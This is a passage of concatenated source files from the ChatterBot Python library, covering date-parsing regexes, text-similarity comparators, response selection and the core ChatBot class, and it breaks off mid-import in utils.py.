[author], 1) ] # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'ChatterBot', u'ChatterBot Documentation', author, 'ChatterBot', 'One line description of project.', 'Miscellaneous'), ] # -- Options for Epub output ---------------------------------------------- # Bibliographic Dublin Core info epub_title = project epub_author = author epub_publisher = author epub_copyright = copyright # A list of files that should not be packed into the epub file epub_exclude_files = ['search.html'] # Configuration for intersphinx intersphinx_mapping = { 'python': ('https://docs.python.org/3', None) } File: chatterbot/response_selection.py """ Response selection methods determines which response should be used in the event that multiple responses are generated within a logic adapter. """ import logging def get_most_frequent_response(input_statement, response_list, storage=None): """ :param input_statement: A statement, that closely matches an input to the chat bot. :type input_statement: Statement :param response_list: A list of statement options to choose a response from. :type response_list: list :param storage: An instance of a storage adapter to allow the response selection method to access other statements if needed. :type storage: StorageAdapter :return: The response statement with the greatest number of occurrences. :rtype: Statement """ matching_response = None occurrence_count = -1 logger = logging.getLogger(__name__) logger.info('Selecting response with greatest number of occurrences.') for statement in response_list: count = len(list(storage.filter( text=statement.text, in_response_to=input_statement.text) )) # Keep the more common statement if count >= occurrence_count: matching_response = statement occurrence_count = count # Choose the most commonly occuring matching response return matching_response def get_first_response(input_statement, response_list, storage=None): """ :param input_statement: A statement, that closely matches an input to the chat bot. :type input_statement: Statement :param response_list: A list of statement options to choose a response from. :type response_list: list :param storage: An instance of a storage adapter to allow the response selection method to access other statements if needed. :type storage: StorageAdapter :return: Return the first statement in the response list. :rtype: Statement """ logger = logging.getLogger(__name__) logger.info('Selecting first response from list of {} options.'.format( len(response_list) )) return response_list[0] def get_random_response(input_statement, response_list, storage=None): """ :param input_statement: A statement, that closely matches an input to the chat bot. :type input_statement: Statement :param response_list: A list of statement options to choose a response from. :type response_list: list :param storage: An instance of a storage adapter to allow the response selection method to access other statements if needed. :type storage: StorageAdapter :return: Choose a random response from the selection. :rtype: Statement """ from random import choice logger = logging.getLogger(__name__) logger.info('Selecting a response from list of {} options.'.format( len(response_list) )) return choice(response_list) File: chatterbot/parsing.py import re from datetime import timedelta, datetime import calendar # Variations of dates that the parser can capture year_variations = ['year', 'years', 'yrs'] day_variations = ['days', 'day'] minute_variations = ['minute', 'minutes', 'mins'] hour_variations = ['hrs', 'hours', 'hour'] week_variations = ['weeks', 'week', 'wks'] month_variations = ['month', 'months'] # Variables used for RegEx Matching day_names = 'monday|tuesday|wednesday|thursday|friday|saturday|sunday' month_names_long = ( 'january|february|march|april|may|june|july|august|september|october|november|december' ) month_names = month_names_long + '|jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec' day_nearest_names = 'today|yesterday|tomorrow|tonight|tonite' numbers = ( r'(^a(?=\s)|one|two|three|four|five|six|seven|eight|nine|ten|' r'eleven|twelve|thirteen|fourteen|fifteen|sixteen|seventeen|' r'eighteen|nineteen|twenty|thirty|forty|fifty|sixty|seventy|' r'eighty|ninety|hundred|thousand)' ) re_dmy = '(' + '|'.join(day_variations + minute_variations + year_variations + week_variations + month_variations) + ')' re_duration = r'(before|after|earlier|later|ago|from\snow)' re_year = r'(19|20)\d{2}|^(19|20)\d{2}' re_timeframe = r'this|coming|next|following|previous|last|end\sof\sthe' re_ordinal = r'st|nd|rd|th|first|second|third|fourth|fourth|' + re_timeframe re_time = r'(?P<hour>\d{1,2})(?=\s?(\:\d|(a|p)m))(\:(?P<minute>\d{1,2}))?(\s?(?P<convention>(am|pm)))?' re_separator = r'of|at|on' NUMBERS = { 'zero': 0, 'one': 1, 'two': 2, 'three': 3, 'four': 4, 'five': 5, 'six': 6, 'seven': 7, 'eight': 8, 'nine': 9, 'ten': 10, 'eleven': 11, 'twelve': 12, 'thirteen': 13, 'fourteen': 14, 'fifteen': 15, 'sixteen': 16, 'seventeen': 17, 'eighteen': 18, 'nineteen': 19, 'twenty': 20, 'thirty': 30, 'forty': 40, 'fifty': 50, 'sixty': 60, 'seventy': 70, 'eighty': 80, 'ninety': 90, 'hundred': 100, 'thousand': 1000, 'million': 1000000, 'billion': 1000000000, 'trillion': 1000000000000, } # Mapping of Month name and Value HASHMONTHS = { 'january': 1, 'jan': 1, 'february': 2, 'feb': 2, 'march': 3, 'mar': 3, 'april': 4, 'apr': 4, 'may': 5, 'june': 6, 'jun': 6, 'july': 7, 'jul': 7, 'august': 8, 'aug': 8, 'september': 9, 'sep': 9, 'october': 10, 'oct': 10, 'november': 11, 'nov': 11, 'december': 12, 'dec': 12 } # Days to number mapping HASHWEEKDAYS = { 'monday': 0, 'mon': 0, 'tuesday': 1, 'tue': 1, 'wednesday': 2, 'wed': 2, 'thursday': 3, 'thu': 3, 'friday': 4, 'fri': 4, 'saturday': 5, 'sat': 5, 'sunday': 6, 'sun': 6 } # Ordinal to number HASHORDINALS = { 'zeroth': 0, 'first': 1, 'second': 2, 'third': 3, 'fourth': 4, 'forth': 4, 'fifth': 5, 'sixth': 6, 'seventh': 7, 'eighth': 8, 'ninth': 9, 'tenth': 10, 'eleventh': 11, 'twelfth': 12, 'thirteenth': 13, 'fourteenth': 14, 'fifteenth': 15, 'sixteenth': 16, 'seventeenth': 17, 'eighteenth': 18, 'nineteenth': 19, 'twentieth': 20, 'last': -1 } # A list tuple of regular expressions / parser fn to match # Start with the widest match and narrow it down because the order of the match in this list matters regex = [ ( re.compile( r''' ( ((?P<dow>%s)[,\s]\s*)? #Matches Monday, 12 Jan 2012, 12 Jan 2012 etc (?P<day>\d{1,2}) # Matches a digit (%s)? [-\s] # One or more space (?P<month>%s) # Matches any month name [-\s] # Space (?P<year>%s) # Year ((\s|,\s|\s(%s))?\s*(%s))? ) ''' % (day_names, re_ordinal, month_names, re_year, re_separator, re_time), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( int(m.group('year') if m.group('year') else base_date.year), HASHMONTHS[m.group('month').strip().lower()], int(m.group('day') if m.group('day') else 1), ) + timedelta(**convert_time_to_hour_minute( m.group('hour'), m.group('minute'), m.group('convention') )) ), ( re.compile( r''' ( ((?P<dow>%s)[,\s][-\s]*)? #Matches Monday, Jan 12 2012, Jan 12 2012 etc (?P<month>%s) # Matches any month name [-\s] # Space ((?P<day>\d{1,2})) # Matches a digit (%s)? ([-\s](?P<year>%s))? # Year ((\s|,\s|\s(%s))?\s*(%s))? ) ''' % (day_names, month_names, re_ordinal, re_year, re_separator, re_time), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( int(m.group('year') if m.group('year') else base_date.year), HASHMONTHS[m.group('month').strip().lower()], int(m.group('day') if m.group('day') else 1) ) + timedelta(**convert_time_to_hour_minute( m.group('hour'), m.group('minute'), m.group('convention') )) ), ( re.compile( r''' ( (?P<month>%s) # Matches any month name [-\s] # One or more space (?P<day>\d{1,2}) # Matches a digit (%s)? [-\s]\s*? (?P<year>%s) # Year ((\s|,\s|\s(%s))?\s*(%s))? ) ''' % (month_names, re_ordinal, re_year, re_separator, re_time), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( int(m.group('year') if m.group('year') else base_date.year), HASHMONTHS[m.group('month').strip().lower()], int(m.group('day') if m.group('day') else 1), ) + timedelta(**convert_time_to_hour_minute( m.group('hour'), m.group('minute'), m.group('convention') )) ), ( re.compile( r''' ( ((?P<number>\d+|(%s[-\s]?)+)\s)? # Matches any number or string 25 or twenty five (?P<unit>%s)s?\s # Matches days, months, years, weeks, minutes (?P<duration>%s) # before, after, earlier, later, ago, from now (\s*(?P<base_time>(%s)))? ((\s|,\s|\s(%s))?\s*(%s))? ) ''' % (numbers, re_dmy, re_duration, day_nearest_names, re_separator, re_time), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: date_from_duration( base_date, m.group('number'), m.group('unit').lower(), m.group('duration').lower(), m.group('base_time') ) + timedelta(**convert_time_to_hour_minute( m.group('hour'), m.group('minute'), m.group('convention') )) ), ( re.compile( r''' ( (?P<ordinal>%s) # First quarter of 2014 \s+ quarter\sof \s+ (?P<year>%s) ) ''' % (re_ordinal, re_year), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: date_from_quarter( base_date, HASHORDINALS[m.group('ordinal').lower()], int(m.group('year') if m.group('year') else base_date.year) ) ), ( re.compile( r''' ( (?P<ordinal_value>\d+) (?P<ordinal>%s) # 1st January 2012 ((\s|,\s|\s(%s))?\s*)? (?P<month>%s) ([,\s]\s*(?P<year>%s))? ) ''' % (re_ordinal, re_separator, month_names, re_year), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( int(m.group('year') if m.group('year') else base_date.year), int(HASHMONTHS[m.group('month').lower()] if m.group('month') else 1), int(m.group('ordinal_value') if m.group('ordinal_value') else 1), ) ), ( re.compile( r''' ( (?P<month>%s) \s+ (?P<ordinal_value>\d+) (?P<ordinal>%s) # January 1st 2012 ([,\s]\s*(?P<year>%s))? ) ''' % (month_names, re_ordinal, re_year), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( int(m.group('year') if m.group('year') else base_date.year), int(HASHMONTHS[m.group('month').lower()] if m.group('month') else 1), int(m.group('ordinal_value') if m.group('ordinal_value') else 1), ) ), ( re.compile( r''' (?P<time>%s) # this, next, following, previous, last \s+ ((?P<number>\d+|(%s[-\s]?)+)\s)? (?P<dmy>%s) # year, day, week, month, night, minute, min ((\s|,\s|\s(%s))?\s*(%s))? ''' % (re_timeframe, numbers, re_dmy, re_separator, re_time), (re.VERBOSE | re.IGNORECASE), ), lambda m, base_date: date_from_relative_week_year( base_date, m.group('time').lower(), m.group('dmy').lower(), m.group('number') ) + timedelta(**convert_time_to_hour_minute( m.group('hour'), m.group('minute'), m.group('convention') )) ), ( re.compile( r''' (?P<time>%s) # this, next, following, previous, last \s+ (?P<dow>%s) # mon - fri ((\s|,\s|\s(%s))?\s*(%s))? ''' % (re_timeframe, day_names, re_separator, re_time), (re.VERBOSE | re.IGNORECASE), ), lambda m, base_date: date_from_relative_day( base_date, m.group('time').lower(), m.group('dow') ) + timedelta(**convert_time_to_hour_minute( m.group('hour'), m.group('minute'), m.group('convention') )) ), ( re.compile( r''' ( (?P<day>\d{1,2}) # Day, Month (%s) [-\s] # One or more space (?P<month>%s) ) ''' % (re_ordinal, month_names), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( base_date.year, HASHMONTHS[m.group('month').strip().lower()], int(m.group('day') if m.group('day') else 1) ) ), ( re.compile( r''' ( (?P<month>%s) # Month, day [-\s] # One or more space ((?P<day>\d{1,2})\b) # Matches a digit January 12 (%s)? ) ''' % (month_names, re_ordinal), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( base_date.year, HASHMONTHS[m.group('month').strip().lower()], int(m.group('day') if m.group('day') else 1) ) ), ( re.compile( r''' ( (?P<month>%s) # Month, year [-\s] # One or more space ((?P<year>\d{1,4})\b) # Matches a digit January 12 ) ''' % (month_names), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( int(m.group('year')), HASHMONTHS[m.group('month').strip().lower()], 1 ) ), ( re.compile( r''' ( (?P<month>\d{1,2}) # MM/DD or MM/DD/YYYY / ((?P<day>\d{1,2})) (/(?P<year>%s))? ) ''' % (re_year), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( int(m.group('year') if m.group('year') else base_date.year), int(m.group('month').strip()), int(m.group('day')) ) ), ( re.compile( r''' (?P<adverb>%s) # today, yesterday, tomorrow, tonight ((\s|,\s|\s(%s))?\s*(%s))? ''' % (day_nearest_names, re_separator, re_time), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: date_from_adverb( base_date, m.group('adverb') ) + timedelta(**convert_time_to_hour_minute( m.group('hour'), m.group('minute'), m.group('convention') )) ), ( re.compile( r''' (?P<named_day>%s) # Mon - Sun ''' % (day_names), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: this_week_day( base_date, HASHWEEKDAYS[m.group('named_day').lower()] ) ), ( re.compile( r''' (?P<year>%s) # Year ''' % (re_year), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime(int(m.group('year')), 1, 1) ), ( re.compile( r''' (?P<month>%s) # Month ''' % (month_names_long), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( base_date.year, HASHMONTHS[m.group('month').lower()], 1 ) ), ( re.compile( r''' (%s) # Matches time 12:00 am or 12:00 pm ''' % (re_time), (re.VERBOSE | re.IGNORECASE), ), lambda m, base_date: datetime( base_date.year, base_date.month, base_date.day ) + timedelta(**convert_time_to_hour_minute( m.group('hour'), m.group('minute'), m.group('convention') )) ), ( re.compile( r''' ( (?P<hour>\d+) # Matches 12 hours, 2 hrs \s+ (%s) ) ''' % ('|'.join(hour_variations)), (re.VERBOSE | re.IGNORECASE), ), lambda m, base_date: datetime( base_date.year, base_date.month, base_date.day, int(m.group('hour')) ) ) ] def convert_string_to_number(value): """ Convert strings to numbers """ if value is None: return 1 if isinstance(value, int): return value if value.isdigit(): return int(value) num_list = map(lambda s: NUMBERS[s], re.findall(numbers + '+', value.lower())) return sum(num_list) def convert_time_to_hour_minute(hour, minute, convention): """ Convert time to hour, minute """ if hour is None: hour = 0 if minute is None: minute = 0 if convention is None: convention = 'am' hour = int(hour) minute = int(minute) if convention.lower() == 'pm': hour += 12 return {'hours': hour, 'minutes': minute} def date_from_quarter(base_date, ordinal, year): """ Extract date from quarter of a year """ interval = 3 month_start = interval * (ordinal - 1) if month_start < 0: month_start = 9 month_end = month_start + interval if month_start == 0: month_start = 1 return [ datetime(year, month_start, 1), datetime(year, month_end, calendar.monthrange(year, month_end)[1]) ] def date_from_relative_day(base_date, time, dow): """ Converts relative day to time Ex: this tuesday, last tuesday """ # Reset date to start of the day base_date = datetime(base_date.year, base_date.month, base_date.day) time = time.lower() dow = dow.lower() if time == 'this' or time == 'coming': # Else day of week num = HASHWEEKDAYS[dow] return this_week_day(base_date, num) elif time == 'last' or time == 'previous': # Else day of week num = HASHWEEKDAYS[dow] return previous_week_day(base_date, num) elif time == 'next' or time == 'following': # Else day of week num = HASHWEEKDAYS[dow] return next_week_day(base_date, num) def date_from_relative_week_year(base_date, time, dow, ordinal=1): """ Converts relative day to time Eg. this tuesday, last tuesday """ # If there is an ordinal (next 3 weeks) => return a start and end range # Reset date to start of the day relative_date = datetime(base_date.year, base_date.month, base_date.day) ord = convert_string_to_number(ordinal) if dow in year_variations: if time == 'this' or time == 'coming': return datetime(relative_date.year, 1, 1) elif time == 'last' or time == 'previous': return datetime(relative_date.year - 1, relative_date.month, 1) elif time == 'next' or time == 'following': return relative_date + timedelta(ord * 365) elif time == 'end of the': return datetime(relative_date.year, 12, 31) elif dow in month_variations: if time == 'this': return datetime(relative_date.year, relative_date.month, relative_date.day) elif time == 'last' or time == 'previous': return datetime(relative_date.year, relative_date.month - 1, relative_date.day) elif time == 'next' or time == 'following': if relative_date.month + ord >= 12: month = relative_date.month - 1 + ord year = relative_date.year + month // 12 month = month % 12 + 1 day = min(relative_date.day, calendar.monthrange(year, month)[1]) return datetime(year, month, day) else: return datetime(relative_date.year, relative_date.month + ord, relative_date.day) elif time == 'end of the': return datetime( relative_date.year, relative_date.month, calendar.monthrange(relative_date.year, relative_date.month)[1] ) elif dow in week_variations: if time == 'this': return relative_date - timedelta(days=relative_date.weekday()) elif time == 'last' or time == 'previous': return relative_date - timedelta(weeks=1) elif time == 'next' or time == 'following': return relative_date + timedelta(weeks=ord) elif time == 'end of the': day_of_week = base_date.weekday() return day_of_week + timedelta(days=6 - relative_date.weekday()) elif dow in day_variations: if time == 'this': return relative_date elif time == 'last' or time == 'previous': return relative_date - timedelta(days=1) elif time == 'next' or time == 'following': return relative_date + timedelta(days=ord) elif time == 'end of the': return datetime(relative_date.year, relative_date.month, relative_date.day, 23, 59, 59) def date_from_adverb(base_date, name): """ Convert Day adverbs to dates Tomorrow => Date Today => Date """ # Reset date to start of the day adverb_date = datetime(base_date.year, base_date.month, base_date.day) if name == 'today' or name == 'tonite' or name == 'tonight': return adverb_date.today().replace(hour=0, minute=0, second=0, microsecond=0) elif name == 'yesterday': return adverb_date - timedelta(days=1) elif name == 'tomorrow' or name == 'tom': return adverb_date + timedelta(days=1) def date_from_duration(base_date, number_as_string, unit, duration, base_time=None): """ Find dates from duration Eg: 20 days from now Currently does not support strings like "20 days from last monday". """ # Check if query is `2 days before yesterday` or `day before yesterday` if base_time is not None: base_date = date_from_adverb(base_date, base_time) num = convert_string_to_number(number_as_string) if unit in day_variations: args = {'days': num} elif unit in minute_variations: args = {'minutes': num} elif unit in week_variations: args = {'weeks': num} elif unit in month_variations: args = {'days': 365 * num / 12} elif unit in year_variations: args = {'years': num} if duration == 'ago' or duration == 'before' or duration == 'earlier': if 'years' in args: return datetime(base_date.year - args['years'], base_date.month, base_date.day) return base_date - timedelta(**args) elif duration == 'after' or duration == 'later' or duration == 'from now': if 'years' in args: return datetime(base_date.year + args['years'], base_date.month, base_date.day) return base_date + timedelta(**args) def this_week_day(base_date, weekday): """ Finds coming weekday """ day_of_week = base_date.weekday() # If today is Tuesday and the query is `this monday` # We should output the next_week monday if day_of_week > weekday: return next_week_day(base_date, weekday) start_of_this_week = base_date - timedelta(days=day_of_week + 1) day = start_of_this_week + timedelta(days=1) while day.weekday() != weekday: day = day + timedelta(days=1) return day def previous_week_day(base_date, weekday): """ Finds previous weekday """ day = base_date - timedelta(days=1) while day.weekday() != weekday: day = day - timedelta(days=1) return day def next_week_day(base_date, weekday): """ Finds next weekday """ day_of_week = base_date.weekday() end_of_this_week = base_date + timedelta(days=6 - day_of_week) day = end_of_this_week + timedelta(days=1) while day.weekday() != weekday: day = day + timedelta(days=1) return day def datetime_parsing(text, base_date=datetime.now()): """ Extract datetime objects from a string of text. """ matches = [] found_array = [] # Find the position in the string for expression, function in regex: for match in expression.finditer(text): matches.append((match.group(), function(match, base_date), match.span())) # Wrap the matched text with TAG element to prevent nested selections for match, value, spans in matches: subn = re.subn( '(?!<TAG[^>]*?>)' + match + '(?![^<]*?</TAG>)', '<TAG>' + match + '</TAG>', text ) text = subn[0] is_substituted = subn[1] if is_substituted != 0: found_array.append((match, value, spans)) # To preserve order of the match, sort based on the start position return sorted(found_array, key=lambda match: match and match[2][0]) File: chatterbot/comparisons.py """ This module contains various text-comparison algorithms designed to compare one statement to another. """ from chatterbot.exceptions import OptionalDependencyImportError from difflib import SequenceMatcher class Comparator: def __init__(self, language): self.language = language def __call__(self, statement_a, statement_b): return self.compare(statement_a, statement_b) def compare(self, statement_a, statement_b): return 0 class LevenshteinDistance(Comparator): """ Compare two statements based on the Levenshtein distance of each statement's text. For example, there is a 65% similarity between the statements "where is the post office?" and "looking for the post office" based on the Levenshtein distance algorithm. """ def compare(self, statement_a, statement_b): """ Compare the two input statements. :return: The percent of similarity between the text of the statements. :rtype: float """ # Return 0 if either statement has a falsy text value if not statement_a.text or not statement_b.text: return 0 # Get the lowercase version of both strings statement_a_text = str(statement_a.text.lower()) statement_b_text = str(statement_b.text.lower()) similarity = SequenceMatcher( None, statement_a_text, statement_b_text ) # Calculate a decimal percent of the similarity percent = round(similarity.ratio(), 2) return percent class SpacySimilarity(Comparator): """ Calculate the similarity of two statements using Spacy models. """ def __init__(self, language): super().__init__(language) try: import spacy except ImportError: message = ( 'Unable to import "spacy".\n' 'Please install "spacy" before using the SpacySimilarity comparator:\n' 'pip3 install "spacy>=2.1,<2.2"' ) raise OptionalDependencyImportError(message) self.nlp = spacy.load(self.language.ISO_639_1) def compare(self, statement_a, statement_b): """ Compare the two input statements. :return: The percent of similarity between the closest synset distance. :rtype: float """ document_a = self.nlp(statement_a.text) document_b = self.nlp(statement_b.text) return document_a.similarity(document_b) class JaccardSimilarity(Comparator): """ Calculates the similarity of two statements based on the Jaccard index. The Jaccard index is composed of a numerator and denominator. In the numerator, we count the number of items that are shared between the sets. In the denominator, we count the total number of items across both sets. Let's say we define sentences to be equivalent if 50% or more of their tokens are equivalent. Here are two sample sentences: The young cat is hungry. The cat is very hungry. When we parse these sentences to remove stopwords, we end up with the following two sets: {young, cat, hungry} {cat, very, hungry} In our example above, our intersection is {cat, hungry}, which has count of two. The union of the sets is {young, cat, very, hungry}, which has a count of four. Therefore, our `Jaccard similarity index`_ is two divided by four, or 50%. Given our similarity threshold above, we would consider this to be a match. .. _`Jaccard similarity index`: https://en.wikipedia.org/wiki/Jaccard_index """ def __init__(self, language): super().__init__(language) try: import spacy except ImportError: message = ( 'Unable to import "spacy".\n' 'Please install "spacy" before using the JaccardSimilarity comparator:\n' 'pip3 install "spacy>=2.1,<2.2"' ) raise OptionalDependencyImportError(message) self.nlp = spacy.load(self.language.ISO_639_1) def compare(self, statement_a, statement_b): """ Return the calculated similarity of two statements based on the Jaccard index. """ # Make both strings lowercase document_a = self.nlp(statement_a.text.lower()) document_b = self.nlp(statement_b.text.lower()) statement_a_lemmas = set([ token.lemma_ for token in document_a if not token.is_stop ]) statement_b_lemmas = set([ token.lemma_ for token in document_b if not token.is_stop ]) # Calculate Jaccard similarity numerator = len(statement_a_lemmas.intersection(statement_b_lemmas)) denominator = float(len(statement_a_lemmas.union(statement_b_lemmas))) ratio = numerator / denominator return ratio File: chatterbot/conversation.py from pytz import UTC from datetime import datetime from dateutil import parser as date_parser class StatementMixin(object): """ This class has shared methods used to normalize different statement models. """ statement_field_names = [ 'id', 'text', 'search_text', 'conversation', 'persona', 'tags', 'in_response_to', 'search_in_response_to', 'created_at', ] extra_statement_field_names = [] def get_statement_field_names(self): """ Return the list of field names for the statement. """ return self.statement_field_names + self.extra_statement_field_names def get_tags(self): """ Return the list of tags for this statement. """ return self.tags def add_tags(self, *tags): """ Add a list of strings to the statement as tags. """ self.tags.extend(tags) def serialize(self): """ :returns: A dictionary representation of the statement object. :rtype: dict """ data = {} for field_name in self.get_statement_field_names(): format_method = getattr(self, 'get_{}'.format( field_name ), None) if format_method: data[field_name] = format_method() else: data[field_name] = getattr(self, field_name) return data class Statement(StatementMixin): """ A statement represents a single spoken entity, sentence or phrase that someone can say. """ __slots__ = ( 'id', 'text', 'search_text', 'conversation', 'persona', 'tags', 'in_response_to', 'search_in_response_to', 'created_at', 'confidence', 'storage', ) def __init__(self, text, in_response_to=None, **kwargs): self.id = kwargs.get('id') self.text = str(text) self.search_text = kwargs.get('search_text', '') self.conversation = kwargs.get('conversation', '') self.persona = kwargs.get('persona', '') self.tags = kwargs.pop('tags', []) self.in_response_to = in_response_to self.search_in_response_to = kwargs.get('search_in_response_to', '') self.created_at = kwargs.get('created_at', datetime.now()) if not isinstance(self.created_at, datetime): self.created_at = date_parser.parse(self.created_at) # Set timezone to UTC if no timezone was provided if not self.created_at.tzinfo: self.created_at = self.created_at.replace(tzinfo=UTC) # This is the confidence with which the chat bot believes # this is an accurate response. This value is set when the # statement is returned by the chat bot. self.confidence = 0 self.storage = None def __str__(self): return self.text def __repr__(self): return '<Statement text:%s>' % (self.text) def save(self): """ Save the statement in the database. """ self.storage.update(self) File: chatterbot/constants.py """ ChatterBot constants """ ''' The maximum length of characters that the text of a statement can contain. The number 255 is used because that is the maximum length of a char field in most databases. This value should be enforced on a per-model basis by the data model for each storage adapter. ''' STATEMENT_TEXT_MAX_LENGTH = 255 ''' The maximum length of characters that the text label of a conversation can contain. The number 32 was chosen because that is the length of the string representation of a UUID4 with no hyphens. ''' CONVERSATION_LABEL_MAX_LENGTH = 32 ''' The maximum length of text that can be stored in the persona field of the statement model. ''' PERSONA_MAX_LENGTH = 50 # The maximum length of characters that the name of a tag can contain TAG_NAME_MAX_LENGTH = 50 DEFAULT_DJANGO_APP_NAME = 'django_chatterbot' File: chatterbot/__init__.py """ ChatterBot is a machine learning, conversational dialog engine. """ from .chatterbot import ChatBot __all__ = ( 'ChatBot', ) File: chatterbot/chatterbot.py import logging from chatterbot.storage import StorageAdapter from chatterbot.logic import LogicAdapter from chatterbot.search import TextSearch, IndexedTextSearch from chatterbot import utils class ChatBot(object): """ A conversational dialog chat bot. """ def __init__(self, name, **kwargs): self.name = name storage_adapter = kwargs.get('storage_adapter', 'chatterbot.storage.SQLStorageAdapter') logic_adapters = kwargs.get('logic_adapters', [ 'chatterbot.logic.BestMatch' ]) # Check that each adapter is a valid subclass of it's respective parent utils.validate_adapter_class(storage_adapter, StorageAdapter) # Logic adapters used by the chat bot self.logic_adapters = [] self.storage = utils.initialize_class(storage_adapter, **kwargs) primary_search_algorithm = IndexedTextSearch(self, **kwargs) text_search_algorithm = TextSearch(self, **kwargs) self.search_algorithms = { primary_search_algorithm.name: primary_search_algorithm, text_search_algorithm.name: text_search_algorithm } for adapter in logic_adapters: utils.validate_adapter_class(adapter, LogicAdapter) logic_adapter = utils.initialize_class(adapter, self, **kwargs) self.logic_adapters.append(logic_adapter) preprocessors = kwargs.get( 'preprocessors', [ 'chatterbot.preprocessors.clean_whitespace' ] ) self.preprocessors = [] for preprocessor in preprocessors: self.preprocessors.append(utils.import_module(preprocessor)) self.logger = kwargs.get('logger', logging.getLogger(__name__)) # Allow the bot to save input it receives so that it can learn self.read_only = kwargs.get('read_only', False) def get_response(self, statement=None, **kwargs): """ Return the bot's response based on the input. :param statement: An statement object or string. :returns: A response to the input. :rtype: Statement :param additional_response_selection_parameters: Parameters to pass to the chat bot's logic adapters to control response selection. :type additional_response_selection_parameters: dict :param persist_values_to_response: Values that should be saved to the response that the chat bot generates. :type persist_values_to_response: dict """ Statement = self.storage.get_object('statement') additional_response_selection_parameters = kwargs.pop('additional_response_selection_parameters', {}) persist_values_to_response = kwargs.pop('persist_values_to_response', {}) if isinstance(statement, str): kwargs['text'] = statement if isinstance(statement, dict): kwargs.update(statement) if statement is None and 'text' not in kwargs: raise self.ChatBotException( 'Either a statement object or a "text" keyword ' 'argument is required. Neither was provided.' ) if hasattr(statement, 'serialize'): kwargs.update(**statement.serialize()) tags = kwargs.pop('tags', []) text = kwargs.pop('text') input_statement = Statement(text=text, **kwargs) input_statement.add_tags(*tags) # Preprocess the input statement for preprocessor in self.preprocessors: input_statement = preprocessor(input_statement) # Make sure the input statement has its search text saved if not input_statement.search_text: input_statement.search_text = self.storage.tagger.get_text_index_string(input_statement.text) if not input_statement.search_in_response_to and input_statement.in_response_to: input_statement.search_in_response_to = self.storage.tagger.get_text_index_string(input_statement.in_response_to) response = self.generate_response(input_statement, additional_response_selection_parameters) # Update any response data that needs to be changed if persist_values_to_response: for response_key in persist_values_to_response: response_value = persist_values_to_response[response_key] if response_key == 'tags': input_statement.add_tags(*response_value) response.add_tags(*response_value) else: setattr(input_statement, response_key, response_value) setattr(response, response_key, response_value) if not self.read_only: self.learn_response(input_statement) # Save the response generated for the input self.storage.create(**response.serialize()) return response def generate_response(self, input_statement, additional_response_selection_parameters=None): """ Return a response based on a given input statement. :param input_statement: The input statement to be processed. """ Statement = self.storage.get_object('statement') results = [] result = None max_confidence = -1 for adapter in self.logic_adapters: if adapter.can_process(input_statement): output = adapter.process(input_statement, additional_response_selection_parameters) results.append(output) self.logger.info( '{} selected "{}" as a response with a confidence of {}'.format( adapter.class_name, output.text, output.confidence ) ) if output.confidence > max_confidence: result = output max_confidence = output.confidence else: self.logger.info( 'Not processing the statement using {}'.format(adapter.class_name) ) class ResultOption: def __init__(self, statement, count=1): self.statement = statement self.count = count # If multiple adapters agree on the same statement, # then that statement is more likely to be the correct response if len(results) >= 3: result_options = {} for result_option in results: result_string = result_option.text + ':' + (result_option.in_response_to or '') if result_string in result_options: result_options[result_string].count += 1 if result_options[result_string].statement.confidence < result_option.confidence: result_options[result_string].statement = result_option else: result_options[result_string] = ResultOption( result_option ) most_common = list(result_options.values())[0] for result_option in result_options.values(): if result_option.count > most_common.count: most_common = result_option if most_common.count > 1: result = most_common.statement response = Statement( text=result.text, in_response_to=input_statement.text, conversation=input_statement.conversation, persona='bot:' + self.name ) response.confidence = result.confidence return response def learn_response(self, statement, previous_statement=None): """ Learn that the statement provided is a valid response. """ if not previous_statement: previous_statement = statement.in_response_to if not previous_statement: previous_statement = self.get_latest_response(statement.conversation) if previous_statement: previous_statement = previous_statement.text previous_statement_text = previous_statement if not isinstance(previous_statement, (str, type(None), )): statement.in_response_to = previous_statement.text elif isinstance(previous_statement, str): statement.in_response_to = previous_statement self.logger.info('Adding "{}" as a response to "{}"'.format( statement.text, previous_statement_text )) # Save the input statement return self.storage.create(**statement.serialize()) def get_latest_response(self, conversation): """ Returns the latest response in a conversation if it exists. Returns None if a matching conversation cannot be found. """ from chatterbot.conversation import Statement as StatementObject conversation_statements = list(self.storage.filter( conversation=conversation, order_by=['id'] )) # Get the most recent statement in the conversation if one exists latest_statement = conversation_statements[-1] if conversation_statements else None if latest_statement: if latest_statement.in_response_to: response_statements = list(self.storage.filter( conversation=conversation, text=latest_statement.in_response_to, order_by=['id'] )) if response_statements: return response_statements[-1] else: return StatementObject( text=latest_statement.in_response_to, conversation=conversation ) else: # The case that the latest statement is not in response to another statement return latest_statement return None class ChatBotException(Exception): pass File: chatterbot/utils.py """ ChatterBot utility functions """ def import_module(dotted_path): """ Imports the specified module based on the dot notated import path for the module. """ import importlib module_parts = dotted_path.split('.') module_path = '.'.join(module_parts[:-1]) module = importlib.import_module(module_path) return getattr(module, module_parts[-1]) def initialize_class(data, *args, **kwargs): """ :param data: A string or dictionary containing a import_path attribute. """ if isinstance(data, dict): import_path = data.get('import_path') data.update(kwargs) Class = import_module(import_path) return Class(*args, **data) else: Class = import_module(data) return Class(*args, **kwargs) def validate_adapter_class(validate_class, adapter_class): """ Raises an exception if validate_class is not a subclass of adapter_class. :param validate_class: The class to be validated. :type validate_class: class :param adapter_class: The class type to check against. :type adapter_class: class :raises: Adapter.InvalidAdapterTypeException """ from chatterbot.adapters import 